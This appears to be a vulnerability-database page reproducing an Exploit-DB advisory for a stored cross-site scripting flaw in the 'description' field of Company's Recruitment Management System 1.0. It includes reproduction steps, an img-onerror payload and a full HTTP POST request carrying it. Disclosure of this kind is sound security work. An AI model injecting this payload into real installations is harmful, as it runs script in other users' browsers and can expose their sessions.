Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)

vendor:

Company's Recruitment Management System

by:

Aniket Anil Deshmane

8.8

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Company's Recruitment Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:company's_recruitment_management_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10, XAMPP

2021

Company’s Recruitment Management System 1.0 – ‘description’ Stored Cross-Site Scripting (XSS)

A stored cross-site scripting (XSS) vulnerability exists in Company's Recruitment Management System 1.0, which allows an attacker to inject malicious JavaScript code into the 'description' field of the 'Vacancies' tab. An attacker can exploit this vulnerability by logging in with a staff account, navigating to the 'Vacancies' tab, clicking on 'Add New Vacancy', entering any random information in the other fields, and then entering a malicious JavaScript payload in the 'Description' field. When a user views the details of the vacancy, the malicious JavaScript code will be executed in the user's browser.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the 'description' field. Additionally, the application should be configured to only allow trusted users to access the 'Vacancies' tab.

Source

Exploit-DB raw data:

# Exploit Title: Company's Recruitment Management System 1.0 -  'description' Stored Cross-Site Scripting (XSS)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP

Step to reproduce:-
1)Login with staff account & Navigate to  Vacancies tab.

2)Click on add new vacancies .Put any random information  on other field except description & go to the description window .

3)In the description field  select insert  link .

5) In Text to display the field add the following payload .

"><img src=x onerror=alert(1)>

*6)Click on save & you are done.It's gonna be triggered when some one open
vacancies details  *

Request:-

POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0)
Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------156186133432167175201476666002
Content-Length: 1012
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/employment_application/admin/?page=vacancies
Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="id"


-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="title"

Test1ee
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="designation_id"

4
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="slots"

1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="status"

1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="description"

<p><br><a href="http://google.com" target="_blank">"><img src="x"
onerror="alert(1)"></a></p>
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------156186133432167175201476666002--